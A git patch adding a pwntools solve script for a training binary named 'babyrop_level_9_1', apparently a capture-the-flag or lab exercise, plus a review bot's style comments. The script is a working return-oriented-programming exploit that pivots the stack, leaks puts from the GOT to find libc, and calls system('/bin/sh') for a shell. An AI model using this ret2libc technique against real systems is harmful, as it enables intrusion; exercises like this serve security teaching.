From 6402b4e2a90aa0f2a5917441a6a1ffd158841c4b Mon Sep 17 00:00:00 2001
From: jc
Date: Wed, 6 Aug 2025 20:16:12 +0300
Subject: [PATCH] solve script

---
 weiss_overlude/babyrop_level_9.1/a.py | 46 +++++++++++++++++++++++++++
 1 file changed, 46 insertions(+)
 create mode 100644 weiss_overlude/babyrop_level_9.1/a.py

diff --git a/weiss_overlude/babyrop_level_9.1/a.py b/weiss_overlude/babyrop_level_9.1/a.py
new file mode 100644
index 0000000..70b52fa
--- /dev/null
+++ b/weiss_overlude/babyrop_level_9.1/a.py
@@ -0,0 +1,46 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./babyrop_level_9_1", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rbp = 0x4011bd
+leave_ret = 0x4021f1
+pop_rdi = 0x402313
+
+# buf
+buf = p64(pop_rbp)
+buf += p64(0x415080+0x10)
+buf += p64(leave_ret)
+buf += p64(pop_rdi)
+buf += p64(target.got.puts)
+buf += p64(target.sym.puts)
+buf += p64(target.sym._start)
+s(buf)
+
+# leak
+r.recvuntil(b"Leaving!\n")
+puts = u64(r.recv(6).ljust(8, b"\x00"))
+log.info("puts: %#x", puts)
+libc.address = puts - libc.sym.puts
+log.info("libc: %#x", libc.address)
+sh = next(libc.search(b"/bin/sh"))
+system = libc.sym.system
+
+# pop
+buf = p64(pop_rbp)
+buf += p64(0x415080+0x10)
+buf += p64(leave_ret)
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+s(buf)
+
+r.interactive()
\ No newline at end of file
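Review bot: `s = lambda a: r.sendline(a)` under `# funcs` binds a lambda to a name, which PEP 8 (E731) discourages because the function then carries no useful name in tracebacks; write `def s(a): return r.sendline(a)` or call `r.sendline` directly. The literal `0x415080+0x10` is repeated in both payload sections and the three values under `# gadgets` are bare magic numbers with no comment recording which build of `./babyrop_level_9_1` they were read from, so a rebuilt binary silently breaks the script; bind the repeated literal once, e.g. `new_rbp = 0x415080 + 0x10`, and add a one-line comment above each address naming its origin. The file also ends without a trailing newline, as the `\ No newline at end of file` marker shows.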